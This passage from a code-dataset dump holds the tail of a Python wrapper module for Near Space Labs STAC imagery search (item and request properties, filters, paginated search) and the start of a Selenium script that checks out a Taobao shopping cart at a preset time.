b_thumbnail_png: bool = True) -> (str, str):\n \"\"\"\nfor asset type and bool, get the extension and href type\n :param asset_type:\n :param b_thumbnail_png:\n :return: str extension, str href type\n \"\"\"\n # TODO finish asset_type map\n ext = \"tif\"\n if asset_type == enum.AssetType.TIFF:\n href_type = \"image/tiff\"\n elif asset_type == enum.AssetType.GEOTIFF:\n href_type = \"image/vnd.stac.geotiff\"\n elif asset_type == enum.AssetType.CO_GEOTIFF:\n href_type = \"image/vnd.stac.geotiff; cloud-optimized=true\"\n elif (asset_type == enum.AssetType.THUMBNAIL and b_thumbnail_png) or asset_type == enum.AssetType.PNG:\n href_type = \"image/png\"\n ext = \"png\"\n elif (asset_type == enum.AssetType.THUMBNAIL and not b_thumbnail_png) or asset_type == enum.AssetType.JPEG:\n href_type = \"image/jpeg\"\n ext = \"jpg\"\n elif asset_type == enum.AssetType.JPEG_2000:\n href_type = \"image/jp2\"\n ext = \"jp2\"\n elif asset_type == enum.AssetType.MRF_XML:\n href_type = \"application/xml\"\n ext = \"xml\"\n else:\n href_type = \"application/octet-stream\"\n ext = \"bin\"\n\n return ext, href_type\n\n\nclass _BaseWrap:\n def __init__(self, stac_data, properties_func, type_url_prefix=\"nearspacelabs.com/proto/\"):\n \"\"\"\n Whether it's a stac_request or a stac_item, allow for the repack_properties method to work\n :param stac_data:\n :param properties_func:\n \"\"\"\n self._stac_data = stac_data\n self.properties = None\n self._properties_func = properties_func\n self._type_url_prefix = type_url_prefix\n\n if stac_data is not None and stac_data.HasField(\"properties\") and properties_func is not None:\n self.properties = properties_func()\n self._stac_data.properties.Unpack(self.properties)\n elif properties_func is not None:\n self.properties = properties_func()\n self._set_properties(self.properties)\n\n def __str__(self):\n return str(self._stac_data)\n\n def _set_properties(self, properties):\n self._stac_data, self.properties = _set_properties(self._stac_data, properties, self._type_url_prefix)\n\n def _get_field(self, metadata_key: str, key: str):\n if self.properties.HasField(metadata_key):\n return getattr(getattr(self.properties, metadata_key), key)\n return None\n\n def _get_wrapped_field(self, metadata_key: str, key: str):\n if self.properties.HasField(metadata_key):\n return getattr(getattr(getattr(self.properties, metadata_key), key), \"value\")\n return None\n\n def _set_internal_sub_object(self, metadata_key: str):\n pass\n\n def _set_field(self, metadata_key: str, key: str, value):\n self._set_internal_sub_object(metadata_key)\n setattr(getattr(self.properties, metadata_key), key, value)\n\n def _set_obj(self, metadata_key: str, key: str, value):\n self._set_internal_sub_object(metadata_key)\n getattr(getattr(self.properties, metadata_key), key).CopyFrom(value)\n\n def _set_nested_obj(self, metadata_key: str, object_key: str, value_key: str, value):\n self._set_internal_sub_object(metadata_key)\n getattr(getattr(getattr(self.properties, metadata_key), object_key), value_key).CopyFrom(value)\n\n def _set_nested_field(self, metadata_key: str, object_key: str, value_key: str, value):\n setattr(getattr(getattr(self.properties, metadata_key), object_key), value_key, value)\n\n def _get_nested_field(self, metadata_key: str, object_key: str, value_key: str):\n if self.properties.HasField(metadata_key):\n return getattr(getattr(getattr(self.properties, metadata_key), object_key), value_key)\n return None\n\n def _get_nested_wrapped_field(self, metadata_key: str, object_key: str, value_key: str):\n if self.properties.HasField(metadata_key):\n return getattr(getattr(getattr(getattr(self.properties, metadata_key), object_key), value_key), \"value\")\n return None\n\n\nclass StacItemWrap(_BaseWrap):\n \"\"\"\nWrapper for StacItem protobuf\n \"\"\"\n\n def __eq__(self, other):\n if not isinstance(other, StacItemWrap):\n return False\n\n return self.equals_pb(other.stac_item)\n\n def __init__(self, stac_item: StacItem = None, properties_constructor=None):\n self._assets = {}\n if stac_item is None:\n stac_data = StacItem()\n else:\n stac_data = StacItem()\n stac_data.CopyFrom(stac_item)\n\n for asset_key in stac_data.assets:\n self._assets[asset_key] = AssetWrap(stac_data.assets[asset_key], asset_key=asset_key)\n\n super().__init__(stac_data, properties_constructor)\n if self.created is None:\n self.created = datetime.now(tz=timezone.utc)\n\n def __copy__(self):\n pass\n\n def __deepcopy__(self, memo):\n cls = self.__class__\n result = cls.__new__(cls)\n memo[id(self)] = result\n for k, v in self.__dict__.items():\n if k == '_stac_data':\n value = StacItem()\n value.CopyFrom(v)\n setattr(result, k, value)\n else:\n setattr(result, k, deepcopy(v))\n return result\n\n @property\n def bbox(self) -> EnvelopeData:\n \"\"\"\nbounding box of data. In form of EnvelopeData\n :return:\n \"\"\"\n return self.stac_item.bbox\n\n @property\n def cloud_cover(self) -> Optional[float]:\n \"\"\"\nget cloud cover value\n :return: float or None\n \"\"\"\n if self.stac_item.HasField(\"eo\") and self.stac_item.eo.HasField(\"cloud_cover\"):\n return self.stac_item.eo.cloud_cover.value\n return None\n\n @cloud_cover.setter\n def cloud_cover(self, value: float):\n if not self.stac_item.HasField(\"eo\"):\n self.stac_item.eo.CopyFrom(Eo(cloud_cover=FloatValue(value=value)))\n else:\n self.stac_item.eo.cloud_cover.CopyFrom(FloatValue(value=value))\n\n @property\n def collection(self) -> str:\n \"\"\"\nthe collection id for the stac item\n :return:\n \"\"\"\n return self.stac_item.collection\n\n @collection.setter\n def collection(self, value: str):\n self.stac_item.collection = value\n\n @property\n def constellation(self) -> enum.Constellation:\n \"\"\"\nthe enum describing the constellation\n :return:\n \"\"\"\n return enum.Constellation(self.stac_item.constellation_enum)\n\n @constellation.setter\n def constellation(self, value: enum.Constellation):\n self.stac_item.constellation_enum = value\n self.stac_item.constellation = self.constellation.name\n\n @property\n def created(self) -> Optional[datetime]:\n if self.stac_item.HasField(\"created\"):\n return datetime.fromtimestamp(self.stac_item.created.seconds, tz=timezone.utc)\n else:\n return None\n\n @created.setter\n def created(self, value: Union[datetime, date]):\n self.stac_item.created.CopyFrom(utils.pb_timestamp(d_utc=value))\n\n @property\n def end_observed(self) -> Optional[datetime]:\n return self.stac_item.end_observed\n\n @end_observed.setter\n def end_observed(self, value: Union[datetime, date]):\n self.stac_item.end_observation.CopyFrom(utils.pb_timestamp(d_utc=value))\n self.stac_item.end_datetime.CopyFrom(utils.pb_timestamp(d_utc=value))\n\n @property\n def feature(self):\n \"\"\"\ngeojson feature with geometry being only aspect defined\n :return:\n \"\"\"\n return {\n 'type': 'Feature',\n 'geometry': self.geometry.__geo_interface__,\n 'id': self.id,\n 'collection': self.collection,\n 'properties': self._feature_properties(),\n 'assets': self._feature_assets()\n }\n\n @staticmethod\n def _append_prop(props: Dict, prop_name: str, prop_value):\n if prop_value is None:\n return props\n if props is None:\n props = {}\n props[prop_name] = prop_value\n return props\n\n def _feature_properties(self) -> Dict:\n props = {}\n props = StacItemWrap._append_prop(props, 'datetime', self.observed.replace(microsecond=0).isoformat())\n props = StacItemWrap._append_prop(props, 'observed', self.observed.replace(microsecond=0).isoformat())\n props = StacItemWrap._append_prop(props, 'mission', self.mission.name)\n props = StacItemWrap._append_prop(props, 'platform', self.platform.name)\n props = StacItemWrap._append_prop(props, 'instrument', self.instrument.name)\n props = StacItemWrap._append_prop(props, 'gsd', self.gsd)\n props = StacItemWrap._append_prop(props, 'eo:cloud_cover', self.cloud_cover)\n props = StacItemWrap._append_prop(props, 'view:off_nadir', self.off_nadir)\n return props\n\n def _feature_assets(self) -> Dict:\n feature_assets = {}\n for asset_wrap in self.get_assets():\n feature_assets[asset_wrap.asset_key] = {\n 'href': asset_wrap.href,\n 'type': asset_wrap.type,\n }\n return feature_assets\n\n @property\n def geometry(self) -> BaseGeometry:\n if self.stac_item.HasField(\"geometry\"):\n return BaseGeometry.import_protobuf(self.stac_item.geometry)\n elif self.stac_item.HasField(\"bbox\"):\n return Polygon.from_envelope_data(self.stac_item.bbox)\n\n @geometry.setter\n def geometry(self, value: BaseGeometry):\n self.stac_item.geometry.CopyFrom(value.geometry_data)\n self.stac_item.bbox.CopyFrom(value.envelope_data)\n\n @property\n def gsd(self) -> Optional[float]:\n \"\"\"\n get cloud cover value\n :return: float or None\n \"\"\"\n if self.stac_item.HasField(\"gsd\"):\n return self.stac_item.gsd.value\n return None\n\n @gsd.setter\n def gsd(self, value: float):\n self.stac_item.gsd.CopyFrom(FloatValue(value=value))\n\n @property\n def id(self) -> str:\n return self.stac_item.id\n\n @id.setter\n def id(self, value: str):\n self.stac_item.id = value\n\n @property\n def instrument(self) -> enum.Instrument:\n return enum.Instrument(self.stac_item.instrument_enum)\n\n @instrument.setter\n def instrument(self, value: enum.Instrument):\n self.stac_item.instrument_enum = value\n self.stac_item.instrument = self.instrument.name\n\n @property\n def mission(self) -> enum.Mission:\n return enum.Mission(self.stac_item.mission_enum)\n\n @mission.setter\n def mission(self, value: enum.Mission):\n self.stac_item.mission_enum = value\n self.stac_item.mission = self.mission.name\n\n @property\n def mosaic_name(self) -> Optional[str]:\n if self.stac_item.HasField(\"mosaic\"):\n return self.stac_item.mosaic.name\n return None\n\n @mosaic_name.setter\n def mosaic_name(self, name: str):\n if not self.stac_item.HasField(\"mosaic\"):\n self.stac_item.mosaic.CopyFrom(Mosaic(name=name))\n else:\n self.stac_item.mosaic.name = name\n\n @property\n def mosaic_quad_key(self) -> Optional[str]:\n \"\"\"\nIf the STAC item is a quad from a mosaic, then it has a quad key that defines the boundaries of the quad. The quad tree\ndefinition is assumed to be the convention defined by Google Maps, based off of there Pseudo-Web Mercator projection.\n\nAn example quad key is '02313012030231'. Quads use 2-bit tile interleaved addresses. The first character defines the\nlargest quadrant (in this case 0 is upper left), the next character ('2') is the upper right quadrant of that first\nquadrant, the 3rd character ('3') is the lower left quadrant of the previous quadrant and so on.\n\nFor more details on the quad tree tiling for maps use `openstreetmaps docs\n`\n :return:\n \"\"\"\n if self.stac_item.HasField(\"mosaic\"):\n return self.stac_item.mosaic.quad_key\n return None\n\n @mosaic_quad_key.setter\n def mosaic_quad_key(self, quad_key: str):\n if not self.stac_item.HasField(\"mosaic\"):\n self.stac_item.mosaic.CopyFrom(Mosaic(quad_key=quad_key))\n else:\n self.stac_item.mosaic.quad_key = quad_key\n\n @property\n def observed(self) -> Optional[datetime]:\n if self.stac_item.HasField(\"datetime\"):\n return datetime.fromtimestamp(self.stac_item.datetime.seconds, tz=timezone.utc)\n elif self.stac_item.HasField(\"observed\"):\n return datetime.fromtimestamp(self.stac_item.observed.seconds, tz=timezone.utc)\n else:\n return None\n\n @observed.setter\n def observed(self, value: Union[datetime, date]):\n self.stac_item.datetime.CopyFrom(utils.pb_timestamp(d_utc=value))\n self.stac_item.observed.CopyFrom(utils.pb_timestamp(d_utc=value))\n\n @property\n def off_nadir(self) -> Optional[float]:\n \"\"\"\n get cloud cover value\n :return: float or None\n \"\"\"\n if self.stac_item.HasField(\"view\") and self.stac_item.view.HasField(\"off_nadir\"):\n return self.stac_item.view.off_nadir.value\n return None\n\n @off_nadir.setter\n def off_nadir(self, value: float):\n if not self.stac_item.HasField(\"view\"):\n self.stac_item.view.CopyFrom(View(off_nadir=FloatValue(value=value)))\n else:\n self.stac_item.view.off_nadir.CopyFrom(FloatValue(value=value))\n\n @property\n def platform(self) -> enum.Platform:\n return enum.Platform(self.stac_item.platform_enum)\n\n @platform.setter\n def platform(self, value: enum.Platform):\n self.stac_item.platform_enum = value\n self.stac_item.platform = self.platform.name\n\n @property\n def provenance_ids(self) -> List[str]:\n \"\"\"\nThe stac_ids that went into creating the current mosaic. They are in the array in the order which they were used in\nthe mosaic\n :return:\n \"\"\"\n return self.stac_item.mosaic.provenance_ids\n\n @property\n def proj(self) -> ProjectionData:\n \"\"\"\nThe projection for all assets of this STAC item. If an Asset has its own proj definition,\nthen that supersedes this projection definition.\n :return: projection information\n \"\"\"\n return self.stac_item.proj\n\n @proj.setter\n def proj(self, value: ProjectionData):\n self.stac_item.proj.CopyFrom(value)\n\n @property\n def stac_item(self) -> StacItem:\n \"\"\"\n get stac_item\n :return: StacItem\n \"\"\"\n return self._stac_data\n\n @property\n def updated(self) -> Optional[datetime]:\n if self.stac_item.HasField(\"updated\"):\n return datetime.fromtimestamp(self.stac_item.updated.seconds, tz=timezone.utc)\n else:\n return None\n\n @updated.setter\n def updated(self, value: Union[datetime, date]):\n self.stac_item.updated.CopyFrom(utils.pb_timestamp(d_utc=value))\n\n def download_asset(self,\n asset_key: str = \"\",\n asset_type: enum.AssetType = enum.AssetType.UNKNOWN_ASSET,\n cloud_platform: enum.CloudPlatform = enum.CloudPlatform.GCP,\n eo_bands: enum.Band = enum.Band.UNKNOWN_BAND,\n asset_key_regex: str = None,\n from_bucket: bool = False,\n file_obj: BinaryIO = None,\n save_filename: str = \"\",\n save_directory: str = \"\") -> str:\n asset_wrap = self.get_asset(asset_key=asset_key,\n asset_type=asset_type,\n cloud_platform=cloud_platform,\n eo_bands=eo_bands,\n asset_key_regex=asset_key_regex)\n\n return asset_wrap.download(from_bucket=from_bucket,\n file_obj=file_obj,\n save_filename=save_filename,\n save_directory=save_directory)\n\n def equals_pb(self, other: StacItem):\n \"\"\"\ndoes the StacItemWrap equal a protobuf StacItem\n :param other:\n :return:\n \"\"\"\n return self.stac_item.SerializeToString() == other.SerializeToString()\n\n @staticmethod\n def _asset_types_match(desired_type: enum.AssetType, asset_type: enum.AssetType,\n b_relaxed_types: bool = False) -> bool:\n if not b_relaxed_types:\n return desired_type == asset_type\n elif desired_type == enum.AssetType.TIFF:\n return asset_type == desired_type or \\\n asset_type == enum.AssetType.GEOTIFF or \\\n asset_type == enum.AssetType.CO_GEOTIFF\n elif desired_type == enum.AssetType.GEOTIFF:\n return asset_type == desired_type or asset_type == enum.AssetType.CO_GEOTIFF\n return asset_type == desired_type\n\n def get_assets(self,\n asset_key: str = None,\n asset_type: enum.AssetType = enum.AssetType.UNKNOWN_ASSET,\n cloud_platform: enum.CloudPlatform = enum.CloudPlatform.UNKNOWN_CLOUD_PLATFORM,\n eo_bands: enum.Band = enum.Band.UNKNOWN_BAND,\n asset_regex: Dict = None,\n b_relaxed_types: bool = False) -> List[AssetWrap]:\n if asset_key is not None and asset_key in self._assets:\n return [self._assets[asset_key]]\n elif asset_key is not None and asset_key and asset_key not in self._assets:\n raise ValueError(\"asset_key {} not found\".format(asset_key))\n\n results = []\n for asset_key in self._assets:\n current = self._assets[asset_key]\n b_asset_type_match = self._asset_types_match(desired_type=asset_type,\n asset_type=current.asset_type,\n b_relaxed_types=b_relaxed_types)\n if (eo_bands is not None and eo_bands != enum.Band.UNKNOWN_BAND) and current.eo_bands != eo_bands:\n continue\n if (cloud_platform is not None and cloud_platform != enum.CloudPlatform.UNKNOWN_CLOUD_PLATFORM) and \\\n current.cloud_platform != cloud_platform:\n continue\n if (asset_type is not None and asset_type != enum.AssetType.UNKNOWN_ASSET) and not b_asset_type_match:\n continue\n if asset_regex is not None and len(asset_regex) > 0:\n b_continue = False\n for key, regex_value in asset_regex.items():\n if key == 'asset_key':\n if not re.match(regex_value, asset_key):\n b_continue = True\n break\n else:\n if not hasattr(current, key):\n raise AttributeError(\"no key {0} in asset {1}\".format(key, current))\n elif not re.match(regex_value, getattr(current, key)):\n b_continue = True\n break\n\n if b_continue:\n continue\n\n # check that asset hasn't changed between protobuf and asset_map\n pb_asset = self.stac_item.assets[asset_key]\n if not current.equals_pb(pb_asset):\n raise ValueError(\"corrupted protobuf. Asset and AssetWrap have differing underlying protobuf\")\n\n results.append(current)\n return results\n\n def get_asset(self,\n asset_key: str = None,\n asset_type: enum.AssetType = enum.AssetType.UNKNOWN_ASSET,\n cloud_platform: enum.CloudPlatform = enum.CloudPlatform.UNKNOWN_CLOUD_PLATFORM,\n eo_bands: Eo.Band = Eo.UNKNOWN_BAND,\n asset_regex: Dict = None,\n b_relaxed_types: bool = False) -> Optional[AssetWrap]:\n results = self.get_assets(asset_key, asset_type, cloud_platform, eo_bands, asset_regex, b_relaxed_types)\n if len(results) > 1:\n raise ValueError(\"must be more specific in selecting your asset. if all enums are used, try using \"\n \"asset_key_regex\")\n elif len(results) == 1:\n return results[0]\n return None\n\n def check_assets_exist(self, b_raise) -> List[str]:\n return _check_assets_exist(self.stac_item, b_raise=b_raise)\n\n\nclass StacRequestWrap(_BaseWrap):\n def __init__(self, stac_request: StacRequest = None, properties_constructor=None, id: str = \"\"):\n if stac_request is None:\n stac_request = StacRequest(id=id)\n\n super().__init__(stac_request, properties_constructor)\n\n @property\n def bbox(self) -> EnvelopeData:\n if self.stac_request.HasField(\"bbox\"):\n return self.stac_request.bbox\n elif self.stac_request.HasField(\"intersects\"):\n return self.intersects.envelope_data\n return None\n\n @bbox.setter\n def bbox(self, value: EnvelopeData):\n # this tests the spatial reference (it would be better to have a dedicated method)\n value = Polygon.from_envelope_data(envelope_data=value).envelope_data\n self.stac_request.bbox.CopyFrom(value)\n self.stac_request.ClearField(\"intersects\")\n\n @property\n def collection(self) -> str:\n return self.stac_request.collection\n\n @collection.setter\n def collection(self, value: str):\n self.stac_request.collection = value\n\n @property\n def constellation(self) -> enum.Constellation:\n return enum.Constellation(self.stac_request.constellation_enum)\n\n @constellation.setter\n def constellation(self, value: enum.Constellation):\n self.stac_request.constellation_enum = value\n\n @property\n def id(self) -> str:\n return self.stac_request.id\n\n @id.setter\n def id(self, value: str):\n self.stac_request.id = value\n\n @property\n def instrument(self) -> enum.Instrument:\n return enum.Instrument(self.stac_request.instrument_enum)\n\n @instrument.setter\n def instrument(self, value: enum.Instrument):\n self.stac_request.instrument_enum = value\n\n @property\n def intersects(self) -> Optional[BaseGeometry]:\n if self.stac_request.HasField(\"intersects\"):\n return BaseGeometry.import_protobuf(self.stac_request.intersects)\n elif self.stac_request.HasField(\"bbox\"):\n return Polygon.from_envelope_data(self.bbox)\n return None\n\n @intersects.setter\n def intersects(self, geometry: BaseGeometry):\n self.stac_request.intersects.CopyFrom(geometry.geometry_data)\n self.stac_request.ClearField(\"bbox\")\n\n @property\n def limit(self) -> int:\n return self.stac_request.limit\n\n @limit.setter\n def limit(self, value: int):\n self.stac_request.limit = value\n\n @property\n def mission(self) -> enum.Mission:\n return enum.Mission(self.stac_request.mission_enum)\n\n @mission.setter\n def mission(self, value: enum.Mission):\n self.stac_request.mission_enum = value\n\n @property\n def mosaic_name(self) -> Optional[str]:\n if self.stac_request.HasField(\"mosaic\"):\n return self.stac_request.mosaic.name\n return None\n\n @mosaic_name.setter\n def mosaic_name(self, value: str):\n if not self.stac_request.HasField(\"mosaic\"):\n self.stac_request.mosaic.CopyFrom(MosaicRequest(name=value))\n else:\n self.stac_request.mosaic.name = value\n\n @property\n def mosaic_quad_key(self) -> Optional[str]:\n \"\"\"\nOverview of :func:`~StacItemWrap.mosaic_quad_key`\n\nThe quad_key to search for mosaic quad STAC items by. If a quad STAC item exists with the key '02313012030231' and this\n'mosaic_quad_key' is set to the key of a smaller internal quad, like '02313012030231300', '02313012030231301',\n'023130120302313', etc, then the aforementioned '02313012030231' STAC item will be returned.\n\nIf a 'mosaic_quad_key' is set to a larger quad, like '02313012030', then the '02313012030231' quad STAC item and many\nother quad STAC items that are contained by '02313012030' are returned.\n :return:\n \"\"\"\n if self.stac_request.HasField(\"mosaic\"):\n return self.stac_request.mosaic.quad_key\n return None\n\n @mosaic_quad_key.setter\n def mosaic_quad_key(self, value: str):\n if not self.stac_request.HasField(\"mosaic\"):\n self.stac_request.mosaic.CopyFrom(MosaicRequest(quad_key=value))\n else:\n self.stac_request.mosaic.quad_key = value\n\n @property\n def offset(self) -> int:\n return self.stac_request.offset\n\n @offset.setter\n def offset(self, value: int):\n self.stac_request.offset = value\n\n @property\n def platform(self) -> enum.Platform:\n return enum.Platform(self.stac_request.platform_enum)\n\n @platform.setter\n def platform(self, value: enum.Platform):\n self.stac_request.platform_enum = value\n\n @property\n def stac_request(self) -> StacRequest:\n return self._stac_data\n\n def set_bounds(self, bounds: Tuple[float, float, float, float], epsg: int = 0, proj4: str = \"\"):\n proj = ProjectionData(proj4=proj4)\n if epsg > 0:\n proj = ProjectionData(epsg=epsg)\n\n bbox = EnvelopeData(xmin=bounds[0], ymin=bounds[1], xmax=bounds[2], ymax=bounds[3], proj=proj)\n self.bbox = bbox\n\n def set_azimuth(self,\n rel_type: enum.FilterRelationship,\n value: float,\n start: float = None,\n end: float = None,\n sort_direction: enum.SortDirection = enum.SortDirection.NOT_SORTED):\n if not self.stac_request.HasField(\"view\"):\n self.stac_request.view.CopyFrom(ViewRequest())\n\n float_filter = self._float_filter(rel_type, value, start, end, sort_direction)\n self.stac_request.view.azimuth.CopyFrom(float_filter)\n\n def set_off_nadir(self,\n rel_type: enum.FilterRelationship,\n value: float,\n start: float = None,\n end: float = None,\n sort_direction: enum.SortDirection = enum.SortDirection.NOT_SORTED):\n if not self.stac_request.HasField(\"view\"):\n self.stac_request.view.CopyFrom(ViewRequest())\n\n float_filter = self._float_filter(rel_type, value, start, end, sort_direction)\n self.stac_request.view.off_nadir.CopyFrom(float_filter)\n\n def set_sun_azimuth(self,\n rel_type: enum.FilterRelationship,\n value: float,\n start: float = None,\n end: float = None,\n sort_direction: enum.SortDirection = enum.SortDirection.NOT_SORTED):\n if not self.stac_request.HasField(\"view\"):\n self.stac_request.view.CopyFrom(ViewRequest())\n\n float_filter = self._float_filter(rel_type, value, start, end, sort_direction)\n self.stac_request.view.sun_azimuth.CopyFrom(float_filter)\n\n def set_sun_elevation(self,\n rel_type: enum.FilterRelationship,\n value: float,\n start: float = None,\n end: float = None,\n sort_direction: enum.SortDirection = enum.SortDirection.NOT_SORTED):\n if not self.stac_request.HasField(\"view\"):\n self.stac_request.view.CopyFrom(ViewRequest())\n\n float_filter = self._float_filter(rel_type, value, start, end, sort_direction)\n self.stac_request.view.sun_elevation.CopyFrom(float_filter)\n\n def set_cloud_cover(self,\n rel_type: enum.FilterRelationship,\n value: float = None,\n start: float = None,\n end: float = None,\n sort_direction: enum.SortDirection = enum.SortDirection.NOT_SORTED):\n if not self.stac_request.HasField(\"eo\"):\n self.stac_request.eo.CopyFrom(EoRequest())\n\n float_filter = self._float_filter(rel_type, value, start, end, sort_direction)\n self.stac_request.eo.cloud_cover.CopyFrom(float_filter)\n\n def set_gsd(self,\n rel_type: enum.FilterRelationship,\n value: float,\n start: float = None,\n end: float = None,\n sort_direction: enum.SortDirection = enum.SortDirection.NOT_SORTED):\n float_filter = self._float_filter(rel_type, value, start, end, sort_direction)\n self.stac_request.gsd.CopyFrom(float_filter)\n\n def set_observed(self,\n rel_type: enum.FilterRelationship,\n value: Union[datetime, date] = None,\n start: Union[datetime, date] = None,\n end: Union[datetime, date] = None,\n sort_direction: enum.SortDirection = enum.SortDirection.NOT_SORTED,\n tzinfo: timezone = timezone.utc):\n self._stac_data.observed.CopyFrom(utils.pb_timestampfield(rel_type=rel_type,\n value=value,\n start=start,\n end=end,\n sort_direction=sort_direction,\n tzinfo=tzinfo))\n\n def set_created(self,\n rel_type: enum.FilterRelationship,\n value: Union[datetime, date] = None,\n start: Union[datetime, date] = None,\n end: Union[datetime, date] = None,\n sort_direction: enum.SortDirection = enum.SortDirection.NOT_SORTED,\n tzinfo: timezone = timezone.utc):\n self._stac_data.created.CopyFrom(utils.pb_timestampfield(rel_type=rel_type,\n value=value,\n start=start,\n end=end,\n sort_direction=sort_direction,\n tzinfo=tzinfo))\n\n def set_updated(self,\n rel_type: enum.FilterRelationship,\n value: Union[datetime, date] = None,\n start: Union[datetime, date] = None,\n end: Union[datetime, date] = None,\n sort_direction: enum.SortDirection = enum.SortDirection.NOT_SORTED,\n tzinfo: timezone = timezone.utc):\n self._stac_data.updated.CopyFrom(utils.pb_timestampfield(rel_type=rel_type,\n value=value,\n start=start,\n end=end,\n sort_direction=sort_direction,\n tzinfo=tzinfo))\n\n def _float_filter(self,\n rel_type: enum.FilterRelationship,\n value: float = None,\n start: float = None,\n end: float = None,\n sort_direction: enum.SortDirection = enum.SortDirection.NOT_SORTED):\n if value is not None:\n if start is not None or end is not None:\n raise ValueError(\"if value is defined, start and end cannot be used\")\n elif rel_type == enum.FilterRelationship.BETWEEN or rel_type == enum.FilterRelationship.NOT_BETWEEN:\n raise ValueError(\"BETWEEN and NOT_BETWEEN cannot be used with value\")\n else:\n if start is None or end is None:\n raise ValueError(\"if start is defined, end must be defined and vice versa\")\n elif rel_type != enum.FilterRelationship.BETWEEN and rel_type != enum.FilterRelationship.NOT_BETWEEN:\n raise ValueError(\"start + end must be used with BETWEEN or NOT_BETWEEN\")\n if rel_type in utils.UNSUPPORTED_TIME_FILTERS:\n raise ValueError(\"currently not supporting filter {}\".format(rel_type.name))\n\n float_filter = FloatFilter(rel_type=rel_type,\n value=value,\n start=start,\n end=end,\n sort_direction=sort_direction)\n return float_filter\n\n\nclass NSLClientEx(NSLClient):\n def __init__(self, nsl_only=False):\n super().__init__(nsl_only=nsl_only)\n self._internal_stac_service = stac_singleton\n\n def update_service_url(self, stac_service_url):\n \"\"\"\n update the stac service address\n :param stac_service_url: localhost:8080, 34.34.34.34:9000, http://demo.nearspacelabs.com, etc\n :return:\n \"\"\"\n super().update_service_url(stac_service_url)\n self._internal_stac_service.update_service_url(stac_service_url=stac_service_url)\n\n def search_ex(self,\n stac_request_wrapped: StacRequestWrap,\n timeout=15,\n nsl_id: str = None,\n profile_name: str = None,\n increment_search: Optional[int] = None) -> Iterator[StacItemWrap]:\n if increment_search is not None and increment_search > 0 and stac_request_wrapped.offset > 0:\n raise ValueError(\"can't use offset and increment_search. offset should be paired with limit, \"\n \"and increment_search should be set to None\")\n\n if increment_search is not None and increment_search > stac_request_wrapped.limit:\n # TODO put a warning here?\n increment_search = None\n\n if increment_search is None or increment_search <= 0:\n for stac_item in list(self.search(stac_request_wrapped.stac_request,\n timeout=timeout,\n nsl_id=nsl_id,\n profile_name=profile_name)):\n if not stac_item.id:\n return\n else:\n yield StacItemWrap(stac_item=stac_item)\n else:\n expected_total = stac_request_wrapped.limit\n total = 0\n stac_request_wrapped.limit = increment_search\n stac_request_wrapped.offset = 0\n items = list(self.search(stac_request_wrapped.stac_request,\n timeout=timeout,\n nsl_id=nsl_id,\n profile_name=profile_name))\n while len(items) > 0:\n for stac_item in items:\n total += 1\n yield StacItemWrap(stac_item=stac_item)\n if total >= expected_total:\n return\n\n stac_request_wrapped.offset += stac_request_wrapped.limit\n items = list(self.search(stac_request_wrapped.stac_request,\n timeout=timeout,\n nsl_id=nsl_id,\n profile_name=profile_name))\n\n def feature_collection_ex(self,\n stac_request_wrapped: StacRequestWrap,\n timeout=15,\n nsl_id: str = None,\n profile_name: str = None,\n increment_search: int = None,\n feature_collection: Dict = None) -> Dict:\n if feature_collection is None:\n feature_collection = {'type': 'FeatureCollection', 'features': []}\n\n items = self.search_ex(stac_request_wrapped,\n timeout=timeout,\n nsl_id=nsl_id,\n profile_name=profile_name,\n increment_search=increment_search)\n for item in items:\n feature_collection['features'].append(item.feature)\n\n return feature_collection\n\n def search_one_ex(self,\n stac_request_wrapped: StacRequestWrap,\n timeout=15,\n nsl_id: str = None,\n profile_name: str = None) -> Optional[StacItemWrap]:\n stac_item = self.search_one(stac_request=stac_request_wrapped.stac_request,\n timeout=timeout, nsl_id=nsl_id, profile_name=profile_name)\n if not stac_item.id:\n return None\n return StacItemWrap(stac_item=stac_item)\n\n def count_ex(self,\n stac_request_wrapped: StacRequestWrap,\n timeout=15,\n nsl_id: str = None,\n profile_name: str = None) -> int:\n return self.count(stac_request=stac_request_wrapped.stac_request,\n timeout=timeout, nsl_id=nsl_id, profile_name=profile_name)\n","sub_path":"nsl/stac/experimental.py","file_name":"experimental.py","file_ext":"py","file_size_in_byte":46401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"592942754","text":"\"\"\"\n功能:定时结算,提交订单,期间有大概2s加载页面的时间\n适用:抢购变价商品\n\nAuthor: 王峥\nDate: 2019-10-13\n\"\"\"\nfrom selenium import webdriver\nimport datetime\nimport time\n\ndef login():\n #扫码登陆淘宝\n browser.get(\"https://www.taobao.com\")\n time.sleep(3)\n if browser.find_element_by_link_text(\"亲,请登录\"):\n browser.find_element_by_link_text(\"亲,请登录\").click()\n print(\"请在15s内完成扫码\")\n time.sleep(15)\n browser.get(\"https://cart.taobao.com/cart.htm\")#转到我的购物车\n #输出登陆时间\n now = datetime.datetime.now()\n print(\"login success\", now.strftime('%Y-%m-%d %H:%M:%S'))\n time.sleep(3)\n\ndef buytime(times, choose):\n #若为单选\n if choose == 2:\n print(\"请手动勾选需要购买的商品\")\n\n #若为全选\n if choose == 1:\n while True:\n try:\n if browser.find_element_by_id(\"J_SelectAll1\"):\n browser.find_element_by_id(\"J_SelectAll1\").click()\n break\n except:\n print(\"找不到购买按钮\")\n\n #时间到了就结算,下订单\n while True:\n #now = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S.%f')\n now = datetime.datetime.now()\n if now > times:\n # 点击结算按钮\n while True:\n try:\n if browser.find_element_by_link_text(\"结 算\"):\n browser.find_element_by_link_text(\"结 算\").click()\n print(f\"结算成功,准备提交订单\")\n break\n except:\n pass\n # 点击提交订单按钮\n while True:\n try:\n if browser.find_element_by_link_text('提交订单'):\n browser.find_element_by_link_text('提交订单').click()\n now = datetime.datetime.now()\n print(\"buytime\", now.strftime('%Y-%m-%d %H:%M:%S'))\n print(f\"抢购成功,请尽快付款\")\n break\n except:\n print(\"再次尝试提交订单\")\n\nif __name__ == '__main__':\n #设置时间格式:\"2018-09-06 11:20:00.000000\"\n #times = input(\"请输入抢购时间,格式如(2018-09-06 11:20:00.000000):\")\n times = datetime.datetime(2019,10,15,16,20,00)\n\n browser = webdriver.Chrome()#使用谷歌浏览器\n browser.maximize_window()\n #登陆 \n login()\n #设置全选或者自动选择\n #choose = int(input(\"到时间自动勾选购物车请输入“1”,否则输入“2”:\"))\n choose = 2\n #定时下单\n buytime(times, 